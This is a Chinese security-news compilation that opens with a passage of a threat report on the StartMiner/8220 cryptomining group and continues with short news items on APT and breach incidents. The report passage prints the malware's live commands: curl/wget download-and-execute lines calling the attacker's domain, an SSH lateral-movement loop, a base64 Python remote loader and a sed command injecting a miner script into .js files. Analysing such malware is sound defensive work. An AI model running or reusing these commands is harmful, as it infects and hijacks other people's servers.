new.py首先生成待攻击的IP列表IP_LIST,其中方法一位获取本机IP的A段和B段,然后依次遍历0~256,1~256组成C段和D段;方法二为随机生成10万个IP,排除内网IP地址;最后把两种方法生成的IP合并到同一个列表得到约16万个IP。 对每个IP进行6379端口(Redis服务)探测连接,如果端口开放,继续判断是否存在Redis未授权访问漏洞。 Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下,攻击者可以在未授权访问Redis的情况下,利用Redis自身的提供的config命令,进行文件的读写等操作,包括将自己的ssh公钥写入到目标服务器的 /root/.ssh文件夹下的authotrized_keys文件中,进而可以使用对应的私钥直接使用ssh服务登录目标服务器。 如果被扫描IP存在Redis未授权访问漏洞,通过命令将curl、wget下载执行恶意脚本hehe.sh的代码写入crontab定时任务(写入“/var/spool/cron”、“/var/spool/cron/crontabs”),每1分钟执行一次。 curl -fsSLk -max -time 40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp || wget –quiet –no-check-certificate –timeout=40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp SSH连接 hehe.sh继续通过基于公钥认证的SSH攻击其他机器,从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的机器建立SSH连接并执行命令下载恶意脚本hehe.sh: if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done fi for file in /home/* do     if test -d $file     then         if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then             for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done         fi     fi done hehe.sh还会通过crontab定时任务设置持久化,定期下载自身运行。 执行base64编码的Python脚本,重新获取Python攻击代码new.py(由ss2.py、ss3.py下载)并发起新的攻击。 I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovL3d3dy5qdWtlc3hkYnJ4ZC54eXovc3MzLnB5Jwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz 解码: #coding: utf-8 import urllib import base64 d= ‘http://www.jukesxdbrxd.xyz/ss3.py’ try:     page=base64.b64decode(urllib.urlopen(d).read())     exec(page) except:     pass 挖矿木马植入 hehe.sh还会查找“.js”文件并在其中插入js挖矿木马http[:]//t.cn/EvlonFh(长链接对应https[:]//xmr.omine.org/assets/v7.js) 插入命令: find / -name ‘*.js’|xargs grep -L f4ce9|xargs sed -i ‘$a\document.write\(‘\’\<script\ src=\”http://t.cn/EvlonFh\”\>\</script\>\<script\>OMINEId\(\”61adfe72ae314d8f86532b3cd1c60bda\”,\”-1\”\)\</script\>\’\)\; js挖矿木马所属网站: 最后下载负责运行Linux平台ELF挖矿木马的shell脚本2start.jpg、3start.jpg: if [ $? -eq 0 ] then pwd else curl -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh curl -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh fi 2start.jpg或3start.jpg判断Linux挖矿木马kworkerdss是否存在 不存在则下载挖矿程序x、xx,以及挖矿配置文件wt.conf。 七、关联家族分析 1.代码相似性 我们取被友商划归为8220挖矿木马的Powershell脚本1.ps1与近期被友商命名为StartMiner的Powershell脚本3.ps1进行对比: 1.ps1  afd9911c85a034902cf8cca3854d4a23 (下载地址:http[:]//192.99.142.248:8220/1.ps1) 3.ps1  faf53676fa29216c14d3698ff44893c8(下载地址:http[:]//www.jukesxdbrxd.xyz/3.ps1) (注:根据木马下载核心shell脚本使用的地址http[:]//www.jukesxdbrxd.xyz/3start.jpg,www[.]jukesxdbrxd.xyz应属于StartMiner) 8220挖矿木马使用的1.ps1的主要有4个功能: 1、下载挖矿木马 2、安装计划任务执行Powershell脚本(持久化),清除旧的计划任务 3、杀死竞品挖矿木马 4、启动挖矿木马 StartMiner使用的3.ps1功能与上述1.ps1完全一致,只是在下载挖矿木马时同时下载了两个文件,因此在启动挖矿进程时也启动相应的两个,增加了通过联网端口匹配竞品挖矿进程,对清除竞品挖矿木马的文件名单进行了补充。 两者相同的清除计划任务名单: “Update service for Oracle products” “Update service for Oracle products5” “Update service for Oracle products1” “Update service for Oracle products2” “Update service for Oracle products3” “Update service for Oracle products4” “Update service for Oracle products7” “Update service for Oracle products8” “Update service for Oracle products0” “Update service for Oracle products9” “Update service for Oracle productsa” “Update service for Oracle productsc” “Update service for Oracle productsm” 两者相同的清除竞品挖矿木马进程名单: ddg.exe yam.exe miner.exe xmrig.exe nscpucnminer32.exe 1e.exe iie.exe 3.exe iee.exe ie.exe je.exe im360sd.exe iexplorer.exe imzhudongfangyu.exe 360tray.exe 360rp.exe 360rps.exe pe.exe me.exe 2.共同的C2 37.44.212.223,作为8220挖矿木马C2:http[:]//37.44.212.223/rig,作为StartMiner C2:http[:]//37.44.212.223/x 3.门罗币钱包 “8220”挖矿木马与StartMiner挖矿木马都使用了门罗币钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ StartMiner: 由steamhuby.exe(8780219e4a6eb4bd1b618aee4167be5a)释放出挖矿配置文件cfg “8220”挖矿木马:由antspywares.exe(4b5df24b5deda127966029ce0fd83897)释放出配置文件cfg 并且steamhuby.exe和antspywares.exe解密挖矿配置文件时创建相同的互斥量“4e064bee1f3860fd606a”,使用相同的密钥:”0125789244697858″。 4. FTP服务器 都使用FTP服务器提供木马下载服务。 8220挖矿木马:ftp[:]//93.174.93.149 StartMiner:ftp[:]//107.189.11.170 基于上述特点我们认为2020年初开始出现的StartMiner与2017年被曝光的“8220”挖矿木马属于同一团伙,而该团伙在近期攻击过程中已不再具有明显的“8220”端口使用的特征。近期攻击过程中偏好使用的文件名如下: PE文件: isassx.exe、steamhuby.exe、kmkww.exe、haha.exe、hue.exe、xmrig1.exe、ww.exe、ww32.exe、x.jpeg、issaasss、xmrig.exe、ww2.exe、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe ELF文件: x86_64、i686、x64b、x32b、hxx、xx、x、1.so、Kworkerdss Linux Shell脚本: 2start.jpg、3start.jpg、response.jpeg、it.sh、go、go4、go3、hehe.sh、xdd.sh、start.sh Powershell脚本: 2.ps1、3.ps1、why.ps1、why2.ps1、why3.ps1、kkmswx.ps1 Python脚本: a.py、b.py、ss2.py、ss3.py、new.py VBS脚本: app.vbs、apps.vbs、poc.vbs PHP文件: linx.php、win.php VM文件(类似于JSP): linx.vm、win,vm、win2.vm txt文件: kmkww.txt、xmr.txt、config.txt、kkmw.txt、kksw.txt IOCS Domain jukesbrxd.xyz www.jukesxdbrxd.xyz IP 107.189.11.170 104.244.75.25 23.94.24.12 104.244.74.248 37.44.212.223 URL http[:]//jukesbrxd.xyz/isassx.exe http[:]//jukesbrxd.xyz/ww.exe http[:]//www.jukesxdbrxd.xyz/steamhuby.exe http[:]//www.jukesxdbrxd.xyz/new.py http[:]//www.jukesxdbrxd.xyz/xmr.txt http[:]//jukesxdbrxd.xyz/hehe.sh http[:]//104.244.75.25/steamhuby.exe http[:]//104.244.75.25/kmkww.exe http[:]//104.244.75.25/i686 http[:]//37.44.212.223/haha.exe http[:]//37.44.212.223/hue.exe http[:]//37.44.212.223/xmrig1.exe http[:]//37.44.212.223/xdxd.txt http[:]//107.189.11.170/a.py http[:]//107.189.11.170/b.py http[:]//107.189.11.170/3.ps1 ftp[:]//107.189.11.170/kmkww.exe ftp[:]//107.189.11.170/linx.php ftp[:]//107.189.11.170/linx.vm ftp[:]//107.189.11.170/win.php ftp[:]//107.189.11.170/win.vm ftp[:]//107.189.11.170/win2.vm ftp[:]//107.189.11.170/ww.exe http[:]//107.189.11.170/x64b http[:]//107.189.11.170/x32b http[:]//185.153.180.59/isassx.exe http[:]//104.244.74.248/x86_64 http[:]//23.94.24.12/kmkww.txt MD5 MD5 病毒名 8780219e4a6eb4bd1b618aee4167be5a Win32.Trojan.Inject.Auto 3c27fc39cccfdca4c38735ba6676364c Win32.Trojan.Inject.Auto ce854dd32e1d931cd6a791b30dcd9458 Win32.Trojan.Inject.Auto 64cb1856e9698cf0457a90c07a188169 Linux.Trojan.Shell.Loni c0ab986107d80f4ddbfdb46d3426244a Linux.Trojan.Shell.Djeg 46aeb7070c73c6f66171c0f86baf9433 Win32.Risk.Bitcoinminer.Pdwo a5c7c93fa57c1fc27cde28b047c85be6 Linux.Trojan.Bitcoinminer.Lnxv afd9911c85a034902cf8cca3854d4a23 Win32.Trojan.Generic.Lscf faf53676fa29216c14d3698ff44893c8 Win32.Trojan.Agent.Auto 3d99bd4a5916308685ab16ed64265b41 Linux.Trojan.Python.Dqdx 15e503acfa91f74b7a3de96cede5bde5 Linux.Trojan.Python.Hzqc 9fe932ac3055045a46d44997a4c6d481 Linux.Trojan.Miner.Rusg c4d44eed4916675dd408ff0b3562fb1f Linux.Backdoor.Tsunami.Ejrw ee48aa6068988649e41febfa0e3b2169 Linux.Backdoor.Tsunami.Amce d4ae941c505ee53e344fb4d4c2e102b7 Win32.Trojan.Miner.Buox c915dee2be8d698a02125caf8e0e938e Linux.Exploit.Redisattack.Kiqf 1e715be740f9f484c67d50f4f5b04d95 Linux.Exploit.Redisattack.Aqmo 25b8710947639ee3572c70f49eb3a207 Win32.Trojan-downloader.Miner.Hrzc e3e156053ef2ea06ae6c7dccba4ad7bc Linux.Backdoor.Phpshell.Gnnv c28cd1fd309d31d2db9a4776651bed4d Linux.Backdoor.Phpshell.Psdk d875b62187076116b9818249d57d565f Linux.Trojan.Miner.Uqid 矿池: 37.59.162.30:5790 23.94.24.12:8080 pool.hashvault.pro:80 钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ 参考链接: 新型IoT/Linux恶意软件针对DVR攻击组成僵尸网络 https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向:利用Aapche Struts高危漏洞入侵,Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期,谨防服务器被StartMiner趁机挖矿! https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ

海莲花(OceanLotus) APT组织滥用合法证书传播高级 Android 威胁

2014年以来,海莲花(OceanLotus)APT组织(或被称为PhantomLance)就以通过官方和第三方市场传播高级Android威胁而闻名。他们试图远程控制受感染的设备、窃取机密数据、安装应用程序并启动任意代码。 安全研究人员最近记录了该组织的活动,Bitdefender调查发现了该组织35个新的恶意样本,并证明其活动可能使用了合法且可能被盗的数字证书来对某些样本进行签名。 该APT组织的作案手法是先上传干净版本,然后添加恶意软件,然后通过Google Play和第三方市场传播恶意Android应用。 安全研究人员认为,海莲花APT组织与Android恶意软件和过去基于Windows的高级威胁的命令和控制域之间的共享基础结构相关联,这些威胁过去一直以Microsoft用户为目标。可以说,这些较早的活动也与Hacking Team组织有联系,该组曾为APT32组织服务。 虽然海莲花主要针对非洲和亚洲,但Bitdefender遥测技术还可以在日本、韩国、越南、德国和印度等国家进行扫描。 Bitdefender 检测到此威胁为  Android.Trojan.OceanLotus。 寻找“零号病人” 在Bitdefender存储库(APK MD5:315f8e3da94920248676b095786e26ad)中找到的,与海莲花APT组织所关联的最古老的样本似乎已于2014年4月首次登陆Google Play 。可追溯到最早的已知Google Play样本在2014年12月。 根据内部zip文件时间戳记,该样本构建于2014年4月5日,几天后就被我们记录下。 一个有趣的发现是,该样本已使用VL Corporation的证书进行了签名。 该证书于2013年7月生成,并且直到2014年为止,除OceanLotus Malware以外,Google Play上已有100多个不同的应用程序在使用它。这表明网络犯罪集团可能已使用有效证书成功地将恶意病毒app走私到了Google Play中。 Certificate:      Data:          Version: 3 (0x2)          Serial Number: 2002933886 (0x7762587e)          Signature Algorithm: sha256WithRSAEncryption          Issuer: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation          Validity              Not Before: Jul 22 18:57:09 2013 GMT              Not After : Jul 16 18:57:09 2038 GMT          Subject: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation 他的证书很可能已被该APT组织泄漏和滥用。目前,在Google Play中使用此证书签名的100多个应用程序中,仍然没有该应用程序。 目标国家 在遥测方面,仅在过去的3个月中,我们就收到25篇涉及此威胁的报告,其中大多数是在美国、日本和韩国。显然,在美国的报告可能不是真实的设备,但亚马逊托管的Android计算机被操纵来运行样本以进行安全分析,对于安全研究人员而言,执行这种沙箱操作并不少见,特别是在尝试获取危害指标或研究恶意行为时。 但是,韩国和日本的报告确实表明,最近遇到过海莲花APT样本的设备至少数量有限。 Android OceanLotus报告威胁的十大国家 追踪传播 在传播方面,虽然安全研究人员已经报告说恶意软件的发行是通过官方的Google Play市场和第三方市场进行的,但一些与Google Play相似的市场仍在托管这些样本。这意味着,尽管Google在及时管理其应用程序并响应安全研究人员和供应商方面做得很出色,但第三方市场(如果有的话)缓慢地消除了这些威胁,甚至有可能无限期地使用户暴露于恶意软件中。 仍托管这些恶意样本的第三方市场的一些样本包括: hxxps://apkpure.com/opengl-plugin/net.vilakeyice.openglplugin hxxps://apk.support/app/net.vilakeyice.openglplugin hxxps://apkplz.net/app/com.zimice.browserturbo hxxps://apk.support/app/com.zimice.browserturbo hxxps://androidappsapk.co/download/com.techiholding.app.babycare/ hxxps://www.apkmonk.com/app/com.techiholding.app.babycare/ hxxps://apkpure.com/cham-soc-be-yeu-babycare/com.techiholding.app.babycare hxxps://apk.support/app-th/com.techiholding.app.babycare 虽然已经有了海莲花APT组织的样本完整列表,我们知道这些样本已出现在Google Play中,但我们添加了以下一些内容,这些内容也已在Google Play上得到确认。 由Bitdefender研究人员发现的海莲花APT组织的其他新样本的md5完整列表如下: 3043a2038b4cb0586f5c52d44be9127d f449cca2bc85b09e9bf4d3c4afa707b6 76265edd8c8c91ad449f9f30c02d2e0b 5d909eff600adfb5c9173305c64678e7 66d4025f4b60abdfa415ebd39dabee49 7562adab62491c021225166c7101e8a1 7b8cba0a475220cc3165a7153147aa84 63e61520febee25fb6777aaa14deeb4a 9236cf4bf1062bfc44c308c723bda7d4 f271b65fa149e0f18594dd2e831fcb30 e6363b3fae89365648b3508c414740cd d9e860e88c22f0b779b8bacef418379e 3d4373015fd5473e0af73bdb3d65fe6a a57bac46c5690a6896374c68aa44d7b3 08663152d9e9083d7be46eb2a16d374c 18577035b53cae69317c95ef2541ef94 eee6dcee1ab06a8fbb8dc234d2989126 5d07791f6f4d892655c3674d142fe12b f0ea1a4d81f8970b0a1f4d5c41f728d8 320e2283c8751851362b858ad5b7b49c 1fb9d7122107b3c048a4a201d0da54cd bb12cc42243ca325a7fe27f88f5b1e1b 01b0b1418e8fee0717cf1c5f10a6086b 4acf53c532e11ea4764a8d822ade9771 6ff1c823e98e35bb7a5091ea52969c6f 1e5213e02dd6f7152f4146e14ba7aa36 3fe46408a43259e400f7088c211a16a3 c334bade6aa52db3eccf0167a591966a 53ba3286a335807e8d2df4aae0bd0977 7f59cb904e2e0548b7f0db12c08b9e25 49d1c82a6b73551743a12faec0c9e8b1 6b323840d7cb55bb5c9287fc7b137e83 2e1ed1f4a5c9149c241856fb07b8216b 6737fba0f2b3ea392f495af9a0aa0306 bda442858c33ae7d9f80227c55f6a584 规避Google Play保护 攻击者通常向Google Play提交一个干净的版本,然后随机等待一段时间,再简单地使用恶意代码更新应用程序。网络犯罪分子似乎也使用了这种策略。 例如,应用程序net.vilakeyice.openglplugin(OpenGLPlugin)最初于 2018 年8月5 日以纯净格式上传,然后在8月21日引入了恶意payload。 APK Seen on Google Play No Payload 7285f44fa75c3c7a27bbb4870fc0cdca 2018.08.05 With Payload d924211bef188ce4c19400eccb6754da 2018.08.21 然后,将payload解密并动态加载到应用程序中。如果较旧的样本将解密密钥本地嵌入在原始的干净应用程序中,则较新的样本将不再将其存储在本地,因为它们似乎接收了解密密钥以及恶意payload。 归因和可用性 尽管这些Android恶意软件样本的归属已经成为安全行业分析的主题,但海莲花APT组织已经被标记为幕后主谋。不过样本仍存在于第三方市场这一事实应当引起注意。 某些时候Google Play上的某些样本目前仍可在第三方市场上获得,  包括在Amazon上。在世界各地可能无法从官方Google Play市场访问内容的地区,用户仍然有感染这种恶意软件的风险。 在亚马逊印度的这个特定样本中,开发人员名称为Caleb Eisenhauer(假名),该应用程序似乎已于 2020 年2月16日发布。与该帐户关联的电子邮件地址(malcesshartspur@gmail.com)发送至托管在GitHub(https://github.com/malcesshartspur)上的隐私政策。 可能存在类似的虚假开发者帐户,它们都在第三方市场上散布了各种样本,如果不删除,有可能在很长一段时间内感染受害者。     消息来源:Bitdefender, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

黑客操纵一物联网僵尸网络 8 年,只为下载动漫视频

北京时间5月7日消息,近8年来,一名黑客一直在悄无声息地将D-Link NVRs(网络录像机)和NAS(网络附加存储)设备劫持到一个僵尸网络中,其唯一目的是连接到在线网站并下载动漫视频。 据报道,这个名为“Cereals”的僵尸网络于2012年首次被发现,并于2015年达到顶峰,当时它积累了超过1万个“僵尸”。 然而,尽管这个僵尸网络规模庞大,但大多数网络安全公司都没有发现它的踪迹。不过目前,“Cereals”正在慢慢消失,因为这些年来它所依赖的旧式D-Link设备已经开始老化,而且用户也在更换产品。此外,一个名为“Cr1ptT0r”的勒索病毒毒株在2019年冬天从许多D-Link系统中破坏了“Cereals”恶意软件,这也加速了这一僵尸网络的衰落。 目前所有证据都表明,这个僵尸网络的作者据称是一个名叫Stefan的德国人,他在制作“Cereals”的过程中从未有任何犯罪意图,似乎只有一个目的——下载动画短片。     (稿源:凤凰网科技,封面源自网络。)

黑客从微软私有 GitHub 库中窃取了 63.2GB 的源代码

今年3月28日宣布成功入侵印尼公司Tokopedia之后,这位黑客近日又发布重磅消息称从微软的私有GitHub库中窃取了容量超过63.2GB的.dump转储文件。根据文件的目录列表截图显示,转储文件中涵盖了Azure, Office和部分Windows runtimes。 随后这条消息得到了数据泄露监控和防范服务机构Under the Breach推特账户的证实。需要注意的是,尽管此次泄露的源代码规模很大,但不代表黑客会获取到微软的核心商业机密,微软在GitHub仓库中存储的内容一般都是公开的,即便存储在私人仓库中的内容也是如此,而且微软还会严格筛查上传的代码来杜绝泄露的情况。     (稿源:cnBeta,封面源自网络。)

越南黑客窃取抗疫情报 利用新冠题材引诱用户

5月7日上午消息,近期发现有黑客组织在不断尝试窃取我国医疗卫生行业的相关机密,通过安全大脑多次监测、追踪到的证据分析证明,该组织确为越南黑客组织APT32(海莲花OceanLotus)。 有关公司表示,本轮攻击使用白利用手法绕过了部分杀毒软件的查杀,利用新冠疫情题材诱使用户执行木马程序,最终达到控制系统、窃取情报的目的,这也是“海莲花”惯用的手法之一。 据介绍,海莲花是高度组织化、专业化的境外国家级黑客组织。从2012年4月起,就针对中国多个实体机构,开展了精密组织的网络攻击。据此前360发布的报告显示,“海莲花”发动的APT攻击,地域广泛涉及我国29个省,以及境外至少36个国家。其主要使用的是“鱼叉攻击”、“水坑攻击”两种方式。在APT潜伏期间,至少使用了4种不同程序形态、不同编码风格和不同攻击原理的木马程序,恶意服务器遍布全球13个国家,注册的已知域名多达35个。 (稿源:新浪科技,封面源自网络。)

任天堂遭史上最大规模黑客攻击 Wii 完整源码和设计泄露

过去几周内的黑客活动因疫情隔离的影响变得更加活跃,索尼顽皮狗《最后的生还者2》泄密也被认为是黑客所为。隔壁任天堂在此前NNID账户被盗之后近日又被不法者盯上,导致了Wii主机的完整源码/设计方案和N64技术演示流出,可以说已经成为任天堂史上最大规模的泄露案件。 根据ResetEra论坛上的汇总,所有的数据都直接从一家和任天堂合作的公司内部窃取。BroadOn在Wii的硬件和游戏上和任天堂都有过交互合作,通过攻击BroadOn服务器黑客获得了Wii主机的所有源代码、数据表、设计框图以及每一个配件的Verilog文件(Verilog是一种硬件描述语言,通过代码文本来描述硬件结构和行为)。 除了Wii和N64的主机相关资料外,本次任天堂被泄露的还有大量《宝可梦》相关档案,包括了《宝可梦黄/蓝》、《宝可梦金/银》的调试版本和源码、《宝可梦日月/终极日月》的调试版本等。 鉴于Wii主机的档案属于商业机密,任天堂和BroadOn显然会付诸法律行动。尽管泄露出来的内容都已经过时,但从规模和性质上来讲,这都称得上是任天堂游戏史上性质最恶劣的黑客攻击。   (稿源:cnBeta,封面源自网络。)

Ghost 博客平台服务器被黑客攻击并安装了加密货币挖掘软件

目前,一场严重的黑客攻击行动正在进行中,已经有数十家公司被黑客攻击。在过去的24小时里,黑客们一直在互联网上大规模扫描Salt,这是一种用于管理和自动化数据中心、云服务器集群和企业网络内部服务器的软件。 攻击者一直在利用最近被修补的两个BUG来访问Salt服务器,然后部署一个加密货币矿机。今天早些时候,据ZDNet报道,黑客成功入侵了移动操作系统LineageOS的服务器。在我们最初报道后的几个小时后,第二个重大黑客事件浮出水面。第二个受害者是Ghost,这是一个基于Node.js的博客平台,据称是WordPress更简单的替代品。在一个状态页面中,Ghost开发团队表示,他们在UTC凌晨1点30分左右检测到了黑客入侵他们的后端基础设施系统。 Ghost开发人员表示,黑客利用CVE-2020-11651(身份验证绕过)和CVE-2020-11652(目录遍历)来控制其Salt主服务器。该博客公司表示,虽然黑客能够访问Ghost(Pro)网站和Ghost.org计费服务,但他们没有窃取任何财务信息或用户凭证。相反,Ghost表示,黑客们安装了一个加密货币挖矿器。Ghost开发人员表示:”这次挖矿尝试使我们的CPU使用率激增,并迅速使我们大部分系统超载,这让我们立即警觉到了这个问题。” 与LineageOS类似,Ghost开发者们在几个小时后,拿下了所有服务器,打了系统补丁,并在几个小时后重新部署并且重新上线。 一位安全研究员表示,这些攻击很可能是通过自动漏洞扫描器进行的,该扫描器检测到了过时的Salt安装,然后自动利用这两个漏洞安装了加密货币恶意软件。   (稿源:cnBeta,封面源自网络。)